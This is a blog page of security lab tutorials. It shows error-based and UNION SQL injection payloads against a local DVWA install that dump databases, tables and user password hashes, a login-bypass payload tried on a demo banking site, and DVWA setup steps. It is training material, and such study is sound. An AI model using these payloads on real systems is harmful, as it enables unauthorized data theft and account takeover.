AdSense

Monday, April 2, 2018

SQL Injection (II): Error based attacks


SQL INJECTION (II): ERROR BASED ATTACKS

 - Layout for this exercise:


1 - Introduction 

 - The Error based SQL injection attacks technique consists in forcing the database to perform some operation in which the result will be an error, what reveals information about the contents of the database. 

 - The attacker will try to extract from the database  some useful data interpreting the error message. 

 - This technique is useful when the attacker can’t exploit the SQL injection vulnerability using other technique such as the UNION command.

 - This exploitation technique may be different for each type of DBMS.

 https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)#Error_based_Exploitation_technique


 2 - Examples of Error-based SQL injections

 - These SQL injection error-based exercises will be performed from a Kali Linux device against a DVWA version 1.0.8 MySQL database, with a setup of "medium"security level, stored at an Ubuntu Linux device running the XAMPP web server.







- Going to the SQL Injection tab, the following SQL entries (written in green) will be introduced at the user ID form:



2.1) Finding the maximum number of entries 

 1,2,3,4,5

 - Trying 1,2,3,4,5, 6 ... 









- When arriving to 6 there is no answer, so we can deduce that the maximum number of entries is 5.

 - The real SQL query would be:

 SELECT first_name, last_name FROM users WHERE ID=X#  where X =1,2,3,4,5,6 ...

 2.2) Finding all the entries of the table

 7 OR 1=1

 - Because 1=1 is always TRUE the whole sentence is also TRUE and the result displays all the entries contained in the table:

- The real SQL query would be:

 SELECT first_name, last_name FROM users WHERE ID=7 OR 1=1, what is always TRUE because 0 OR 1 = 1.
2.3) Discovering the type of database

' (simple quotation mark)

 - Entering a simple quote mark the error message shows the name or type of database (MySQL in this case):



- The actual query would be:

 SELECT first_name, last_name FROM users WHERE ID = ' , what gives an error answer because there is no user ID='.

- By the way, the single quote ' could be sanitized by a backslash character \' that would produce a scape sequence. 
2.4) Finding the number or columns/attributes selected by the user input field

 1 ORDER BY X

 - Taking the user ID=1 and trying X = 10, 5, 4, 3 as the column parameters, the application gives an error message:








- The real SQL query would be:

 SELECT first_name, last_name FROM users WHERE ID=1 ORDER BY X#

 - Finally, entering X = 2, 1 the answer is correct, what means that the user input fields selects two columns or attributes (first_name, last_name):





2.5) Finding the username

 5 UNION SELECT NULL, USER()#

 - The username is displayed with the command user():



- The UNION operator is used in SQL injections to join a query, purposely forged by the tester, to the original query. 

 - The result of the forged query will be joined to the result of the original query, allowing the tester to obtain the values of columns of other tables. 
- For instance, the UNION operator can be used when the SQL injection flaw happens in a SELECT statement, making it possible to combine two queries into a single result or result set.

- The real SQL query would be:

 SELECT first_name, last_name FROM users WHERE ID=5 UNION SELECT user()

 - The NULL value is taken because the UNION command works only when both sides have the same number of values. 

 - In this case we have 2 values at the right side (first_name and last_name), so we also need 2 values at the left side (NULL and user()).

 - By the way, this query is similar to the next three examples, just changing the parameter user() to parameters version(), @@hostname and database()


 2.6) Finding the database version

 5 UNION SELECT NULL, VERSION()#

 - The database version is displayed with the command version():


2.7) Finding the hostname

 5 UNION SELECT NULL, @@HOSTNAME#

 - The hostname of the device in which the application is running is displayed:


2.8) Finding the database name

 5 UNION SELECT NULL, DATABASE()#

 - The command database() fetchs the database name:


2.9) Finding all databases in the server

 1 UNION SELECT NULL, TABLE_SCHEMA FROM INFORMATION_SCHEMA.TABLES#

 - The result enumerates the databases present in the server:


- The real SQL query would be:

 SELECT first_name, last_name FROM users WHERE ID=1 UNION SELECT null, table_schema FROM information_schema.tables#
2.10)  Finding all tables names inside the database "dvwa"

 1 UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x64767761#

 - Where 0x64767761 is the hexadecimal ASCII corresponding to the name "dvwa":

- The result is that there are two tables inside the database "dvwa" (0x64767761 in hexadecimal): "guestbook" and "users".

 - In this case the real SQL query would be:

 SELECT first_name, last_name FROM users WHERE ID=1 UNION SELECT null, table_name FROM information_schema.tables WHERE table_schema=0x64767761#
2.11) Finding column names in the table "users"

 1 UNION SELECT NULL,CONCAT(TABLE_NAME,0x0A,COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x7573657273#

 - Where 0x7573657273 corresponds to the hexadecimal ASCII of the table "users", and 0x0A corresponds to the Line Feed character entered before displaying each column:

- The results displays the names of the columns at the table "users". Some of them seem interesting, for example the column "password" ...
2.12) Finding usernames and passwords from the table "users"

1 UNION SELECT NULL, CONCAT(FIRST_NAME,0x0A, LAST_NAME,0x0A, USER, 0x0A, PASSWORD, 0x0A) FROM users#

 - The result is the list of all usernames and passwords (encrypted with the MD5 hash because the database users that algorithm to store them).

 - Let's notice that 4 Line Feed characters (0x0A) are used because the answer is composed of 4 subresults (first_name, last_name, user and password):

- The real SQL query would be:

 SELECT first_name, last_name FROM users WHERE ID=1 
UNION
SELECT null, CONCAT(first_name, 0x0A, last_name, 0x0A, user, 0x0A, password, 0x0A) FROM users #

3 - Decrypting the passwords

 -  The MD5 passwords hashes obtained before can be decrypted with a tool like this:




































Posted by at
Labels:

SQL Injection (I): Authentication bypass


SQL INJECTION (I): AUTHENTICATION BYPASS

 - Layout for this exercise:


1 - SQL INJECTION

 - An SQL injection attack consists of insertion or "injection" of either a partial or complete SQL query via the data input or transmitted from the client (browser) to the web application. 

 https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)

 - A successful SQL injection attack can read sensitive data from the database, modify database data (insert/update/delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file existing on the DBMS file system or write files into the file system, and, in some cases, issue commands to the operating system. 

 - SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.

 - A successful SQL Injection attack requires the attacker to craft a syntactically correct SQL Query. 

 - If the application returns an error message generated by an incorrect query, then it may be easier for an attacker to reconstruct the logic of the original query and, therefore, understand how to perform the injection correctly. 
- However, if the application hides the error details, then the attacker must be able to reverse engineer the logic of the original query.
2 - AUTHENTICATION BYPASS

 - This type of SQL Injection tries to gain access to a database by inserting SQL Queries within the input fields of a login application, so that the security mechanism is bypassed. 

 - Let's take as victim example this demo banking account login page:

 http://demo.testfire.net/bank/login.aspx

 - Because it is a demo webpage we know in advance that this database holds a record like this:


- Let's start by examining an usual login SQL query:

 SELECT account FROM USERS WHERE username = 'admin' AND password = 'admin'

 - The boolean statement username = 'admin' AND password = 'admin' is only TRUE when both boolean operators are TRUE (1 AND 1 = 1).

- In this way, entering the correct credentials admin/admin for both the username and password fields the access is correct:




- However, if one the operators is FALSE (password = '12345') the whole statement falls to FALSE (1 AND 0 = 0):

 SELECT account FROM USERS WHERE username = 'admin' AND password = '12345'
- So, entering incorrect credentials like admin/12345 the login process fails:


- By the way, entering a simple quotation mark character (') is a good way to discover if the application is prone to SQL Injection, like it is the case:


- Taking advantage of the SQL query boolean structure, we can forge the credentials so that the whole statement becomes TRUE. For instance:

 SELECT account FROM USERS WHERE username = 'admin' AND password = 'x' or 'a'='a'
- Let's notice that 'x' or 'a'='a' is always TRUE (x OR 1 = 1), so the whole statement again would be TRUE (1 AND 1 = 1)

- Checking that a crafted password like x' or 'a'='a gives access to the database:




- Even more, using x' or 'a'='a both for username and password (x' or 'a'='a / x' or 'a'='a) also does the trick of giving access to the database:

- In this final case what we actually have is this:

 SELECT account FROM USERS WHERE username =  'x' or 'a'='aAND password = 'x' or 'a'='a'


 - The SQL query always falls to TRUE, because both AND operators are TRUE (1 AND 1 = 1). In other words:

 SELECT account FROM USERS WHERE TRUE AND TRUE
Posted by at
Labels:

Installing XAMPP and DVWA at Linux Ubuntu 17.10.1


INSTALLING XAMPP AND DVWA AT LINUX UBUNTU 17.10.1
- The goal of this exercise is to install the XAMPP web server plaftorm and DVWA web vulnerable application at the Ubuntu 17.10.1 Linux distro.

1 - XAMPP

 - XAMPP is a free and open source cross-platform web server solution stack package developed by Apache Friends, consisting mainly of the Apache HTTP Server, MySQL/MariaDB database, and interpreters for scripts written in the PHP and Perl programming languages.

 - XAMPP stands for Cross-Platform (X), Apache (A), MySQL/MariaDB (M), PHP (P) and Perl (P). 

 - The version 5.6.34 using MySQL can be downloaded from here:

https://sourceforge.net/projects/xampp/files/XAMPP%20Linux/5.6.34/






- Giving executable permissions to the XAMPP installer:



- Running the installation:




- Going to /opt/lampp, where XAMPP has been installed:
- Starting Apache, MySQL and FTP services at XAMPP:

2 - DAMN VULNERABLE WEB APP (DVWA)

 - Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is "damn vulnerable". 

 - Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

 http://www.dvwa.co.uk/

 https://github.com/ethicalhack3r/DVWA

- Downloading the application:
- Extracting to the folder webtest:









- Renaming DVWA-master to dvwa, for greater ease of use:





- Now, the whole folder dvwa must be copied to the /opt/lamp/htdocs directory, where web site related content is stored by XAMPP:
- Setting up the DVWA Database:






- However, there is an error because not using the correct credential, so config.inc.php file must be edited:





- Creating a new config.inc.php:



- Editing config.inc.php:
- The line regarding db_password must be altered:


- Also, for future exercises let's establish the security level to "low":


- Resetting the database the installation is now successful: 




- Finally, the DVWA login page is available:



- Entering the credentials admin:password:
Posted by at
Labels:
Subscribe to: Posts (Atom)